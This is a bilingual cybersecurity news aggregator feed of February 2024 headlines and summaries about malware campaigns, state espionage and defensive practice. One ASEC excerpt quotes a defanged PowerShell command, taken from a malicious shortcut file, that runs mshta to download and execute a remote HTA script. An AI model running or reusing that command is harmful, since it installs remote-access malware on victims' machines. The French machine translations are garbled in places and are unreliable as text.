What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2024-02-08 15:58:00 | Hijackloader évolue: les chercheurs décodent les dernières méthodes d'évasion HijackLoader Evolves: Researchers Decode the Latest Evasion Methods (lien direct) |
Les acteurs de la menace derrière un logiciel malveillant de chargeur appelé & nbsp; hijackloader & nbsp; ont ajouté de nouvelles techniques pour l'évasion de la défense, car le malware continue d'être de plus en plus utilisé par d'autres acteurs de la menace pour fournir des charges utiles et des outils supplémentaires.
"Le développeur de logiciels malveillants a utilisé une technique de creux de processus standard couplée à un déclencheur supplémentaire qui a été activé par le processus parent qui écrit sur un tuyau" "
The threat actors behind a loader malware called HijackLoader have added new techniques for defense evasion, as the malware continues to be increasingly used by other threat actors to deliver additional payloads and tooling. "The malware developer used a standard process hollowing technique coupled with an additional trigger that was activated by the parent process writing to a pipe," |
Malware Threat | ★★★ | |
 |
2024-02-08 14:00:00 | La Chine a attrapé le rat en laisse conçu pour les appareils FortiGate China Caught Dropping RAT Designed for FortiGate Devices (lien direct) |
Le renseignement militaire néerlandais prévient que de nouveaux logiciels malveillants, appelés «Coathanger», ont été trouvés dans plusieurs dispositifs de Fortigate lors d'une réponse aux incidents, et que les acteurs de l'État chinois utilisent le rat persistant pour l'espionnage.
Dutch military intelligence warns that new malware, called "Coathanger," was found in multiple FortiGate devices during an incident response, and that Chinese-state actors are using the persistent RAT for espionage. |
Malware | ★★★ | |
 |
2024-02-08 13:45:57 | Maldocs dans Word et Excel: un défi de cybersécurité persistant MalDocs in Word and Excel: A Persistent Cybersecurity Challenge (lien direct) |
> Highlights & Middot;Les anciennes vulnérabilités présentent toujours des risques: malgré plusieurs années, les CVE de 2017 et 2018 dans Microsoft Word et Excel restent des menaces actives dans le paysage de la cybersécurité.Les exemples incluent CVE-2017-11882, CVE-2017-0199 et CVE-2018-0802.& Middot;Utilisation généralisée par les cybercriminels: ces vulnérabilités sont exploitées par des logiciels malveillants bien connus tels que Guloader, l'agent Tesla, FormBook et autres.Les groupes APT ont également obtenu la liste, Gamaredon APT étant un exemple notable.Ils ciblent des secteurs lucratifs comme la finance, le gouvernement et les soins de santé, indiquant une approche stratégique des attaquants.& Middot;Défis de détection: malgré leur âge, ces Maldocs peuvent échapper à la détection en raison de leur sophistiqué [& # 8230;]
>Highlights · Old Vulnerabilities Still Pose Risks: Despite being several years old, CVEs from 2017 and 2018 in Microsoft Word and Excel remain active threats in the cybersecurity landscape. Examples include CVE-2017-11882, CVE-2017-0199, and CVE-2018-0802. · Widespread Use by Cybercriminals: These vulnerabilities are exploited by well-known malware such as GuLoader, Agent Tesla, Formbook, and others. APT groups also got on the list, with Gamaredon APT being a notable example. They target lucrative sectors like finance, government, and healthcare, indicating a strategic approach by attackers. · Challenges in Detection: Despite their age, these MalDocs can evade detection due to their sophisticated […] |
Malware Vulnerability | ★★★ | |
 |
2024-02-08 13:34:14 | Les logiciels malveillants Android Xloader peuvent désormais automatiquement après l'installation Android XLoader malware can now auto-execute after installation (lien direct) |
Une nouvelle version du malware Android Xloader a été découverte qui s'exécute automatiquement sur les appareils qu'il infecte, ne nécessitant aucune interaction utilisateur.[...]
A new version of the XLoader Android malware was discovered that automatically executes on devices it infects, requiring no user interaction to launch. [...] |
Malware Mobile | ★★ | |
 |
2024-02-08 13:00:00 | Rise sans précédent de la malvertisation comme précurseur de ransomware Unprecedented Rise of Malvertising as a Precursor to Ransomware (lien direct) |
Ransomware Malware | ★★ | ||
|
2024-02-08 12:23:00 | Le nouveau voleur de Golang de Kimsuky \\ a \\ 'troll \\' et \\ 'gobear \\' cible de porte dérobée de la Corée du Sud Kimsuky\\'s New Golang Stealer \\'Troll\\' and \\'GoBear\\' Backdoor Target South Korea (lien direct) |
L'acteur de l'État-nation lié à la Corée du Nord connue sous le nom de Kimsuky est soupçonné d'utiliser un voleur d'informations basé à Golang auparavant sans papiers appelé & nbsp; troll Stealer.
Le malware vole "SSH, Filezilla, C Fichiers / répertoires de lecteur, navigateurs, informations système, [et] captures d'écran" des systèmes infectés, la société sud-coréenne de cybersécurité S2W & NBSP; Said & Nbsp; dans un nouveau rapport technique.
Troll
The North Korea-linked nation-state actor known as Kimsuky is suspected of using a previously undocumented Golang-based information stealer called Troll Stealer. The malware steals "SSH, FileZilla, C drive files/directories, browsers, system information, [and] screen captures" from infected systems, South Korean cybersecurity company S2W said in a new technical report. Troll |
Malware Technical | ★★★ | |
 |
2024-02-08 11:00:00 | Avez-vous toujours besoin d'une protection antivirus pour Windows en 2024? Do you still need antivirus protection for Windows in 2024? (lien direct) |
The content of this post is solely the responsibility of the author. AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article. The question of whether you need antivirus (AV) for Windows devices is always up for debate. The advancements and new technology have made the operating system (OS) more secure and reliable. Nevertheless, the effectiveness and lethality of cyber threats have increased as well. And every year, millions of Windows users fall victim to various digital perils. This article will discuss whether antivirus software is needed for Windows devices. You’ll discover how AVs work and the most common cyberattacks they can prevent. Moreover, we’ll review the benefits and drawbacks of built-in and third-party antivirus software. How does antivirus work? Scanning, removing, preventing – these are the 3 main stages of how an antivirus works. Once you install an AV, it scans every email, app, and file. During this process, it compares the results with its database. If something is off, the antivirus marks it as malware. Then, the AV either quarantines the malicious files or entirely obliterates them. And while all that is happening, a reliable antivirus runs smoothly in the background, preventing intruders from harming your devices and stealing your data. According to Datto’s global research, Windows device users should be the most concerned about their safety. Around 91% of gadgets that use this OS have been targeted by ransomware attacks. Nevertheless, none of the OS are entirely immune to various online perils. Whether using a Mac, Windows, or Android device, it’s better to be safe than sorry and use an AV. That way, you won’t put yourself, your devices, or your precious data at risk. What threats can a Windows antivirus prevent? As we briefly mentioned, a reliable antivirus can protect your device from online dangers. There are a few most common ones. Below, you’ll find them and what threat they pose: Viruses: These malicious programs multiply and spread from one computer to another. Viruses can attach themselves to programs and files, damage the system, and let other malware in. | Ransomware Malware Threat Mobile | ★★★ | |
 |
2024-02-08 08:00:40 | Blueshell utilisé dans les attaques contre les systèmes Linux en Corée (2) BlueShell Used in Attacks Against Linux Systems in Korea (2) (lien direct) |
Ahnlab Security Intelligence Center (ASEC) a précédemment téléchargé l'article «Blueshell utilisé dans les attaques appropriées contre le coréen et le thaïlandaisCibles »[1] sur le blog ASEC qui a introduit des souches de logiciels malveillants Blueshell qui ont été utilisés contre les systèmes Linux en Thaïlande et en Corée.L'acteur de menace a personnalisé le malware BlueShell Backdoor pour leur attaque et a configuré la condition de fonctionnement des logiciels malveillants pour travailler uniquement dans des systèmes spécifiques.Même après la sortie de l'article, les souches de logiciels malveillants Blueshell développées par le même acteur de menace sont collectées en continu ...
AhnLab SEcurity intelligence Center (ASEC) previously uploaded the article “BlueShell Used in APT Attacks Against Korean and Thai Targets” [1] on the ASEC blog which introduced BlueShell malware strains that were used against Linux systems in Thailand and Korea. The threat actor customized the BlueShell backdoor malware for their attack, and configured the malware’s operating condition to only work in specific systems. Even after the article’s release, the BlueShell malware strains developed by the same threat actor are being continuously collected... |
Malware Threat | ★★★ | |
 |
2024-02-08 07:29:53 | Moqhao Evolution: les nouvelles variantes commencent automatiquement juste après l'installation MoqHao evolution: New variants start automatically right after installation (lien direct) |
> 
Rédigé par Dexter Shin Moqhao est une famille de logiciels malveillants Android bien connue associée au groupe d'actrice de menace Mantis itinérante d'abord ...
> 
Authored by Dexter Shin MoqHao is a well-known Android malware family associated with the Roaming Mantis threat actor group first...
|
Malware Threat Mobile | ★★ | |
|
2024-02-07 16:24:17 | Les publicités Facebook poussent un nouveau logiciel malveillant ov3r_stealer Facebook ads push new Ov3r_Stealer password-stealing malware (lien direct) |
Un nouveau logiciel malveillant de vol de mots de passe nommé OV3R_STELER se propage via de fausses publicités sur Facebook, visant à voler des informations d'identification et de crypto-monnaie.[...]
A new password-stealing malware named Ov3r_Stealer is spreading through fake job advertisements on Facebook, aiming to steal account credentials and cryptocurrency. [...] |
Malware | ★★★ | |
|
2024-02-07 13:14:14 | Raspberry Robin: évolution de la cyber-menace avec des exploits avancés et des tactiques de furtivité Raspberry Robin: Evolving Cyber Threat with Advanced Exploits and Stealth Tactics (lien direct) |
> Faits saillants de la clé: & # 160;& Middot;Développement rapide de l'exploitation: Raspberry Robin exploite de nouveaux exploits d'escalade des privilèges locaux (LPE) développés avant les connaissances publiques, faisant allusion à une capacité de développement interne ou à un accès à un marché d'exploitation sophistiqué.& Middot;Techniques de livraison et d'évasion innovantes: une nouvelle méthode de distribution via la discorde et les stratégies d'évasion raffinées améliorent sa furtivité, ce qui rend la détection par des mesures de sécurité conventionnelles plus difficiles.& Middot;Méthodes de communication adaptatives: Les modifications des techniques de communication et de mouvement latéral sont conçues pour contourner les signatures comportementales en fonction de ses itérations précédentes, démontrant l'adaptabilité des logiciels malveillants.& # 160;Raspberry Robin, un malware identifié pour la première fois en 2021, a montré [& # 8230;]
>Key Highlights: · Rapid Exploit Development: Raspberry Robin leverages new 1-day Local Privilege Escalation (LPE) exploits developed ahead of public knowledge, hinting at either an in-house development capability or access to a sophisticated exploit market. · Innovative Delivery and Evasion Techniques: A novel distribution method via Discord and refined evasion strategies enhance its stealth, making detection by conventional security measures more challenging. · Adaptive Communication Methods: Modifications in communication and lateral movement techniques are designed to circumvent behavioral signatures based on its previous iterations, demonstrating the malware’s adaptability. Raspberry Robin, a malware first identified in 2021, has shown […] |
Malware Threat | ★★ | |
|
2024-02-07 13:02:36 | Raspberry Robin continue de monter sur la vague de 1 jour sans fin Raspberry Robin Keeps Riding the Wave of Endless 1-Days (lien direct) |
> Résultats clés Introduction Raspberry Robin est un ver largement distribué rapporté pour la première fois par Red Canary en 2021. Ses capacités et évasions en plus de sa distribution très active en ont fait l'un des logiciels malveillants les plus intrigants.Chez Check Point Research a publié un article il y a quelques mois en utilisant Raspberry Robin comme exemple [& # 8230;]
>Key Findings Introduction Raspberry Robin is a widely distributed worm first reported by Red Canary in 2021. Its capabilities and evasions in addition to its very active distribution made it one of the most intriguing malware out there. We at Check Point Research published an article a couple of months ago using Raspberry Robin as an example […] |
Malware | ★★ | |
|
2024-02-07 12:21:29 | Non, 3 millions de brosses à dents électriques n'ont pas été utilisées dans une attaque DDOS No, 3 million electric toothbrushes were not used in a DDoS attack (lien direct) |
Une histoire largement signalée selon laquelle 3 millions de brosses à dents électriques ont été piratées avec des logiciels malveillants pour mener des attaques de déni de service distribué (DDOS) est probablement un scénario hypothétique au lieu d'une attaque réelle.[...]
A widely reported story that 3 million electric toothbrushes were hacked with malware to conduct distributed denial of service (DDoS) attacks is likely a hypothetical scenario instead of an actual attack. [...] |
Malware | ★★ | |
 |
2024-02-07 09:30:00 | Les espions chinois piratent les réseaux néerlandais avec un nouveau logiciel malveillant Coathanger Chinese Spies Hack Dutch Networks With Novel Coathanger Malware (lien direct) |
Les services de renseignement néerlandais ont blâmé la Chine pour une attaque l'année dernière ciblant les appareils Fortiguard
Dutch intelligence services have blamed China for an attack last year targeting FortiGuard devices |
Malware Hack | ★★★ | |
|
2024-02-07 01:59:51 | Distribution des logiciels malveillants de rat déguisés en fichier lié au jeu Distribution of RAT Malware Disguised as a Gambling-related File (lien direct) |
AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-relateddéposer.Comme la méthode de distribution de Venomrat introduit le mois dernier ([1]), le malware est réparti via un fichier de raccourci (.lnk), et il télécharge le rat directement depuis HTA.Le fichier de raccourci distribué contient une commande PowerShell malveillante qui exécute MSHTA et télécharge le script malveillant.Commande PowerShell C: \ Windows \ System32 \ Windowspowershell \ V1.0 \ PowerShell.exe.$ Env: C: \ W * \ S * 2 \ M * H? A. * \\ 'hxxp: //193.***.*** [.] 253: 7287 / 2.hta.hta \\«Les URL malveillantes dans le fichier de raccourci confirmé sont les suivantes: hxxp: //193.***.*** [.] 253: 7287 / 2.hta.hta ...
AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-related file. Like the distribution method of VenomRAT introduced last month ([1]), the malware is spread via a shortcut (.lnk) file, and it downloads the RAT directly from HTA. The distributed shortcut file contains a malicious PowerShell command which runs mshta and downloads the malicious script. PowerShell command C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.* \'hxxp://193.***.***[.]253:7287/2.hta.hta\' The malicious URLs in the confirmed shortcut file are as follows: hxxp://193.***.***[.]253:7287/2.hta.hta... |
Malware | ★★★ | |
 |
2024-02-06 21:40:55 | La vision Pro de l'Apple a piraté le jour du lancement Apple’s Vision Pro Hacked On Launch Day (lien direct) |
Juste quelques heures suivant la publication de son casque de réalité mixte très médiatisée, Apple Vision Pro, un chercheur en sécurité a pu découvrir une vulnérabilité critique du noyau dans le logiciel de l'appareil \\ & # 8211;Visionos, qui, s'il est exploité, pourrait potentiellement permettre aux jailbreaks et aux attaques de logiciels malveillants. Joseph Ravichandran (@ 0xjprx), un doctorat.L'étudiant du Massachusetts Institute of Technology (MIT) avec une expertise en matière de sécurité des microarchitectures, s'est rendu à X (anciennement Twitter) tard vendredi soir, pour partager ses idées sur la vulnérabilité du noyau identifiée, qui serait un éventuel exploit de noyau divulgué publiquement pour la première divulgation pour l'exploitation du noyau pour la première divulgation pour l'exploitation du noyau pour la première divulgation pour l'exploitation du noyau pour la première divulgation pour l'exploitation du noyau pour la première divulgation pour l'exploitation du noyau pour la première divulgation pour l'exploitation du noyau pour la première divulgation de l'Exploit pour le noyau pour la première divulgation publiquement pour lales visionos. Lorsque le périphérique se bloque, il passe à la passe complète et affiche un avertissement pour retirer l'appareil en 30 secondes afin qu'il puisse redémarrer.Assez cool pic.twitter.com/f4kyxsivsq & mdash;Joseph Ravichandran (@ 0xjprx) | Malware Vulnerability Threat | ★★★★ | |
|
2024-02-06 19:39:00 | Attention: fausses publicités sur Facebook Spreading \\ 'ov3r_stealer \\' pour voler la cryptographie et les informations d'identification Beware: Fake Facebook Job Ads Spreading \\'Ov3r_Stealer\\' to Steal Crypto and Credentials (lien direct) |
Les acteurs de la menace tirent parti de faux publicités sur Facebook comme un leurre pour tromper des cibles potentielles dans l'installation d'un nouveau codécarpement malware de voleur basé sur Windows Coded & nbsp; OV3R_STELER.
"Ce malware est conçu pour voler des informations d'identification et des portefeuilles cryptographiques et les envoyer dans une chaîne télégramme que l'acteur de menace surveille", a déclaré Trustwave SpiderLabs dans un rapport partagé avec The Hacker News.
OV3R_STELER
Threat actors are leveraging bogus Facebook job advertisements as a lure to trick prospective targets into installing a new Windows-based stealer malware codenamed Ov3r_Stealer. "This malware is designed to steal credentials and crypto wallets and send those to a Telegram channel that the threat actor monitors," Trustwave SpiderLabs said in a report shared with The Hacker News. Ov3r_Stealer |
Malware Threat | ★★★ | |
 |
2024-02-06 17:15:07 | Les logiciels malveillants de Coathanger chinois ont traîné pour sécher par le Département de la Défense néerlandaise Chinese Coathanger malware hung out to dry by Dutch defense department (lien direct) |
L'attaque s'est produite en 2023 en utilisant une porte dérobée sur mesure, confirmant les soupçons de l'une année Les autorités néerlandaises lancent le rideau lors d'une tentative de cyberattaque l'année dernière dans son ministère de la Défense (MOD), blâmant l'État chinois parrainé par l'État chinoisAttaquants pour l'intrusion axée sur l'espionnage.…
Attack happened in 2023 using a bespoke backdoor, confirming year-old suspicions Dutch authorities are lifting the curtain on an attempted cyberattack last year at its Ministry of Defense (MoD), blaming Chinese state-sponsored attackers for the espionage-focused intrusion.… |
Malware | ★★★ | |
|
2024-02-06 13:49:13 | Les pirates chinois infectent le réseau militaire néerlandais par des logiciels malveillants Chinese hackers infect Dutch military network with malware (lien direct) |
Un groupe de cyber-espionnage chinois a violé le ministère néerlandais de la défense l'an dernier et a déployé des logiciels malveillants sur des dispositifs compromis, selon le service de renseignement et de sécurité militaire (MIVD) des Pays-Bas.[...]
A Chinese cyber-espionage group breached the Dutch Ministry of Defence last year and deployed malware on compromised devices, according to the Military Intelligence and Security Service (MIVD) of the Netherlands. [...] |
Malware | ★★★★ | |
|
2024-02-06 11:00:00 | AI en cybersécurité: 8 cas d'utilisation que vous devez connaître AI in Cybersecurity: 8 use cases that you need to know (lien direct) |
The content of this post is solely the responsibility of the author. AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article. Cybercriminals live on the cutting edge of technology, and nothing fits the label more than artificial intelligence. It helps them design sophisticated, evolving malware, pose as higher-ups, and even successfully imitate biometrics like one’s voice. The use of AI in cyber security has developed as a natural response to these new and unpredictable challenges. How are cyber security experts using artificial intelligence to thwart the bad guys? The following eight use cases will tell you all you need to know. 1. Threat prevention and preemption It\'s not uncommon for businesses and organizations to be under persistent attack. Cyber threats can burrow deep into their networks and spread chaos for months before detection. Since AI models have large datasets of past behaviors to draw on, they can spot anomalous behavior far more quickly. Preventing attacks before deployment is among cyber security’s most desirable goals. If you have the right information, it can become a reality. For example, a cybersecurity team can use a proxy network to regularly scrape the contents of forums and other sites dedicated to hacking. They may then act on the gathered info and meet future attacks head-on. 2. Timely incident response Not even an AI-enhanced cybersecurity framework can stop all incoming attacks. Someone might connect an unsanctioned device, or an update might contain malicious code. Either way, a robust cyber security AI can respond to such incidents promptly, blocking or deleting the offending actors. 3. Data protection Data is the basis on which modern economies operate. Whether you obtain it through web scraping API, surveys, as part of your day-to-day operations, etc., the data you collect needs powerful safeguards. AI can help by classifying and automatically encrypting it. Access control is another process you can automate, as is compliance with data protection laws like the GDPR. | Spam Malware Tool Threat | ★★ | |
 |
2024-02-06 05:00:20 | Comment les cybercriminels augmentent-ils le privilège et se déplacent-ils latéralement? How Do Cybercriminals Escalate Privilege and Move Laterally? (lien direct) |
If you want to understand how cybercriminals cause business-impacting security breaches, the attack chain is a great place to start. The eight steps of this chain generalize how a breach progresses from start to finish. The most impactful breaches typically follow this pattern: Steps in the attack chain. In this blog post, we will simplify the eight steps of an attack into three stages-the beginning, middle and end. Our focus here will primarily be on the middle stage-info gathering, privilege escalation and lateral movement, which is often the most challenging part of the attack chain to see and understand. The middle steps are often unfamiliar territory, except for the most highly specialized security practitioners. This lack of familiarity has contributed to significant underinvestment in security controls required to address attacks at this stage. But before we delve into our discussion of the middle, let\'s address the easiest stages to understand-the beginning and the end. The beginning of the attack chain A cyberattack has to start somewhere. At this stage, a cybercriminal gains an initial foothold into a target\'s IT environment. How do they do this? Mainly through phishing. A variety of tactics are used here including: Stealing a valid user\'s login credentials Luring a user into installing malicious software, such as Remote Access Trojans (RATs) Calling the company\'s help desk to socially engineer the help desk into granting the attacker control over a user\'s account Much ink has been spilled about these initial compromise techniques. This is why, in part, the level of awareness and understanding by security and non-security people of this first stage is so high. It is fair to say that most people-IT, security and everyday users-have personally experienced attempts at initial compromise. Who hasn\'t received a phishing email? A great deal of investment goes into security tools and user training to stop the initial compromise. Think of all the security technologies that exist for that purpose. The list is very long. The end of the attack chain Similarly, the level of awareness and understanding is also very high around what happens at the end of the attack chain. As a result, many security controls and best practices have also been focused here. Everyone-IT, security and even everyday users-understands the negative impacts of data exfiltration or business systems getting encrypted by ransomware attackers. Stories of stolen data and ransomed systems are in the news almost daily. Now, what about the middle? The middle is where an attacker attempts to move from the initially compromised account(s) or system(s) to more critical business systems where the data that\'s worth exfiltrating or ransoming is stored. To most people, other than red teamers, pen testers and cybercriminals, the middle of the attack chain is abstract and unfamiliar. After all, regular users don\'t attempt to escalate their privileges and move laterally on their enterprise network! These three stages make up the middle of the attack chain: Information gathering. This includes network scanning and enumeration. Privilege escalation. During this step, attackers go after identities that have successively higher IT system privileges. Or they escalate the privilege of the account that they currently control. Lateral movement. Here, they hop from one host to another on the way to the “crown jewel” IT systems. Steps in the middle of the attack chain. Relatively few IT or security folks have experience with or a deep understanding of the middle of the attack chain. There are several good reasons for this: Most security professionals are neither red teamers, pen testers, nor cybercriminals. The middle stages are “quiet,” unlike initial compromise-focused phishing attacks or successful ransomware attacks, which are very “loud” by comparison. Unlike the front and back end of the attack chain, there has been little coverage about how these steps | Ransomware Malware Tool Vulnerability Threat | ★★★ | |
|
2024-02-06 05:00:18 | Elon Musk veut vous envoyer à Mars: un tour d'horizon de quelques leurres impairs récents Elon Musk Wants to Send You to Mars: A Round Up of Some Recent Odd Lures (lien direct) |
Nous savons tous qu'Internet peut être un endroit étrange dans le meilleur des cas, il ne devrait donc pas surprendre que les cybercriminels du monde contribuent leur juste part d'étrangeté.Mais au cours des dernières semaines, nos chercheurs ont rencontré une poignée de campagnes malveillantes qui vont bien au-delà du niveau habituel de Bizarre pour atteindre leurs objectifs d'ingénierie sociale. Billets pour Mars Il y a quelques années à peine, le tourisme spatial faisait la une des gros titres.Il semblait que l'âge des escarpins orbitaux était juste au coin de la rue, et que la NASA construirait des bases de lune d'ici longtemps.Malheureusement, il y a eu des revers, et pour l'instant, l'espace reste la réserve des astronautes, des scientifiques et des très riches.Mais en suivant le principe «Go Big Or Rad Home», une récente campagne de messagerie malveillante ne s'est pas arrêtée au vol spatial sub-orbital ou ne visite pas sur la lune, promettant aux destinataires de gagner un voyage à Mars. Avec une ligne d'objet de «vous gagnez un voyage à Mars», les messages contenaient un PDF avec une image d'une récente biographie d'Elon Musk et une boîte de dialogue de mise à jour spoofée pour Adobe Reader.Le bouton de téléchargement de la fausse image liée à un fichier tar.gz contenant un exécutable qui a finalement téléchargé Redline Stealer. Le moment de cette campagne est intéressant, car le support natif de ce type de fichier dans Windows 11 n'a commencé qu'en octobre 2023. Les acteurs de menace occasionnellement proposent des leurres si improbables qu'il est difficile d'imaginer quiconque tombe amoureux d'eux.Mais il y a une méthode dans leur folie.Pour certains destinataires, la curiosité seule sera un leurre efficace.Après tout, l'ingénierie sociale consiste à amener votre victime à faire ce que vous voulez dans ce cas, en cliquant sur un lien de téléchargement.Et vous ne devez pas croire que vous allez vraiment gagner un voyage à Mars pour être intéressé à découvrir pourquoi vous en avez offert un. Service client grossier Nous avons tous de mauvais jours, mais les médias sociaux ont transformé les plaintes des clients en sport de spectateur.Dans cette campagne à faible volume, un acteur de menace non attribué a distribué des messages censés provenir de clients furieux appelés «Daniel Rodriguez» ou «Emma Grace».Daniel et Emma étaient tellement en colère contre le service qu'ils ont reçu qu'ils n'ont pas simplement envoyé un e-mail pour se plaindre - ils ne semblaient pas avoir rédigé des pensées encore plus étendues dans une pièce jointe appelée «attitude_reports.svg». Curieusement, SVG est l'extension de fichier pour les graphiques vectoriels évolutifs - un type de fichier inhabituel dans lequel notez vos réflexions sur un employé irrespectueux.Mais si le destinataire était suffisamment consciencieux pour télécharger la pièce jointe, les problèmes s'ensuivirent. Le SVG s'est ouvert dans un navigateur, initiant une chaîne d'infection complexe menant au malware du voleur de phédrone.La chaîne d'attaque était remarquable pour son utilisation de CVE-2023-38831, ainsi que d'être un exemple de l'utilisation croissante des fichiers SVG dans le paysage post-macro. De l'Ukraine à l'Ouzbékistan Le conflit entre la Russie et l'Ukraine a provoqué des troubles dans toute la région, et même les cybercriminels du monde ont été affectés.Dans une récente campagne, nos chercheurs ont remarqué un attaquant essayant d'utiliser la difficulté de l'approvisionnement en produits en Ukraine comme prétexte pour cibler les victimes potentielles dans toute l'Europe au nom de leurs partenaires en Ouzbékistan. Les messages contenaient une image hyperlienne usurpant une pièce jointe PDF.Les victimes cliquant sur l'image ont été adressées vers une URL MediaFire déclenchant une chaîne d'infection, ce qui a finalement conduit à l'agenttesla. Pour plus d'informations de nos chercheurs sur les menaces, abonnez-vous au podcast dé | Malware Threat | ★★ | |
 |
2024-02-05 23:09:08 | Réponse d'urgence: naviguer dans la crise du VPN Ivanti ensemble Emergency Response: Navigating Through the Ivanti VPN Crisis Together (lien direct) |
> Les VPN hérités sont devenus une responsabilité de sécurité importante pour les entreprises et les gouvernements.Les VPN nécessitent un accès entrant aux réseaux d'entreprise, élargissant considérablement la surface d'attaque pour les logiciels malveillants.Cela en fait des objectifs de premier plan pour les acteurs de la menace, augmentant le risque de perturbation de votre entreprise.Les VPN sont construits sur une base de confiance implicite excessive, qui peut par inadvertance [& # 8230;]
>Legacy VPNs have become a significant security liability for businesses and governments. VPNs require inbound access to corporate networks, significantly broadening the attack surface for malware. This makes them prime targets for threat actors, increasing the risk of disruption to your business. VPNs are built on a foundation of excessive implicit trust, which can inadvertently […] |
Malware Threat | ★★★ | |
|
2024-02-05 22:38:14 | Variante fraîche \\ 'Mispadu Stealer \\' émerge Fresh \\'Mispadu Stealer\\' Variant Emerges (lien direct) |
La dernière itération des logiciels malveillants semble des cibles au Mexique.
Latest iteration of the malware appears aimed at targets in Mexico. |
Malware | ★★★ | |
 |
2024-02-05 21:31:30 | Vajraspy: un patchwork d'applications d'espionnage VajraSpy: A Patchwork of Espionage Apps (lien direct) |
#### Description
Les chercheurs de l'ESET ont découvert une nouvelle campagne de cyber-espionnage qui utilise douze applications Android transportant Vajraspy, un cheval de Troie (rat) d'accès à distance utilisé par le groupe Patchwork Apt.
Six des applications étaient disponibles sur Google Play, et six ont été trouvés sur Virustotal.Les applications ont été annoncées comme des outils de messagerie, et on se faisait passer pour une application d'actualités.Vajraspy possède une gamme de fonctionnalités d'espionnage qui peuvent être élargies en fonction des autorisations accordées à l'application regroupée avec son code.Il vole les contacts, les fichiers, les journaux d'appels et les messages SMS, mais certaines de ses implémentations peuvent même extraire les messages WhatsApp et Signal, enregistrer des appels téléphoniques et prendre des photos avec l'appareil photo.La campagne a ciblé les utilisateurs principalement au Pakistan, et les acteurs de la menace ont probablement utilisé des escroqueries de romantisme ciblées pour attirer leurs victimes dans l'installation du malware.
#### URL de référence (s)
1. https://www.welivesecurity.com/en/eset-research/vajraspy-patchwork-espionage-apps/
#### Date de publication
1er février 2024
#### Auteurs)
Lukas Stefanko
#### Description ESET researchers have discovered a new cyber espionage campaign that uses twelve Android apps carrying VajraSpy, a remote access trojan (RAT) used by the Patchwork APT group. Six of the apps were available on Google Play, and six were found on VirusTotal. The apps were advertised as messaging tools, and one posed as a news app. VajraSpy has a range of espionage functionalities that can be expanded based on the permissions granted to the app bundled with its code. It steals contacts, files, call logs, and SMS messages, but some of its implementations can even extract WhatsApp and Signal messages, record phone calls, and take pictures with the camera. The campaign targeted users mostly in Pakistan, and the threat actors likely used targeted honey-trap romance scams to lure their victims into installing the malware. #### Reference URL(s) 1. https://www.welivesecurity.com/en/eset-research/vajraspy-patchwork-espionage-apps/ #### Publication Date February 1, 2024 #### Author(s) Lukas Stefanko |
Malware Tool Threat Mobile | ★★★ | |
|
2024-02-05 18:48:00 | Patchwork utilisant des leurres d'escroquerie romanes pour infecter les appareils Android avec des logiciels malveillants Vajraspy Patchwork Using Romance Scam Lures to Infect Android Devices with VajraSpy Malware (lien direct) |
L'acteur de menace connu sous le nom de patchwork a probablement utilisé des leurres d'escroquerie romantique pour piéger les victimes au Pakistan et en Inde, et infecter leurs appareils Android par un cheval de Troie à distance appelé & nbsp; vajraspy.
La société de cybersécurité slovaque ESET a déclaré avoir découvert 12 applications d'espionnage, dont six étaient disponibles en téléchargement sur le Google Play Store officiel et ont été téléchargés collectivement plus de 1 400 fois entre
The threat actor known as Patchwork likely used romance scam lures to trap victims in Pakistan and India, and infect their Android devices with a remote access trojan called VajraSpy. Slovak cybersecurity firm ESET said it uncovered 12 espionage apps, six of which were available for download from the official Google Play Store and were collectively downloaded more than 1,400 times between |
Malware Threat Mobile | ★★★ | |
 |
2024-02-05 16:00:00 | Python Info-voleur distribué par un document malveillant Excel Python Info-stealer Distributed by Malicious Excel Document (lien direct) |
Fortiguard Labs a découvert une campagne de logiciels malveillants impliquant un voleur d'informations Python distribué par Excel Document.Apprendre encore plus.
FortiGuard Labs has uncovered a malware campaign involving a python info-stealer distributed by Excel document. Learn more. |
Malware | ★★★ | |
|
2024-02-05 11:41:18 | 7 conseils pour développer une approche proactive pour éviter le vol de données 7 Tips to Develop a Proactive Approach to Prevent Data Theft (lien direct) |
Data is one of the most valuable assets for a modern enterprise. So, of course, it is a target for theft. Data theft is the unauthorized acquisition, copying or exfiltration of sensitive information that is typically stored in a digital format. To get it, bad actors either abuse privileges they already have or use various other means to gain access to computer systems, networks or digital storage devices. The data can range from user credentials to personal financial records and intellectual property. Companies of all sizes are targets of data theft. In September 2023, the personal data of 2,214 employees of the multinational confectionary firm The Hershey Company was stolen after a phishing attack. And in January 2024, the accounting firm of Framework Computer fell victim to an attack. A threat actor posed as the Framework\'s CEO and convinced the target to share a spreadsheet with the company\'s customer data. Data thieves aim to profit financially, disrupt business activities or do both by stealing high-value information. The fallout from a data breach can be very costly for a business-and the cost is going up. IBM reports that the global average cost of a data breach in 2023 was $4.45 million, a 15% increase over three years. Other data suggests that the average cost of a breach is more than double for U.S. businesses-nearly $9.5 million. Not all data breaches involve data theft, but stealing data is a top aim for many attackers. Even ransomware gangs have been shifting away from data encryption in their attacks, opting instead to steal massive amounts of data and use its value as a means to compel businesses to pay ransom. So, what can businesses do to prevent data theft? Taking a proactive approach toward stopping someone from stealing your data is a must. This blog post can help jump-start your thinking about how to improve data security. We explore how data theft happens and describe some common threats that lead to it. We also outline seven strategies that can help reduce your company\'s risk of exposure to data theft and highlight how Proofpoint can bolster your defenses. Understanding data theft-and who commits it Data theft is a serious security and privacy breach. Data thieves typically aim to steal information like: Personally identifiable information (PII) Financial records Intellectual property (IP) Trade secrets Login credentials Once they have it, bad actors can use stolen data for fraudulent activities or, in the case of credential theft, to gain unlawful access to accounts or systems. They can also sell high-value data on the dark web. The consequences of data theft for businesses can be significant, if not devastating. They include hefty compliance penalties, reputational damage, and financial and operational losses. Take the manufacturing industry as an example. According to one source, a staggering 478 companies in this industry have experienced a ransomware attack in the past five years. The costs in associated downtime are approximately $46.2 billion. To prevent data theft, it\'s important to recognize that bad actors from the outside aren\'t the only threat. Insiders, like malicious employees, contractors and vendors, can also steal data from secured file servers, database servers, cloud applications and other sources. And 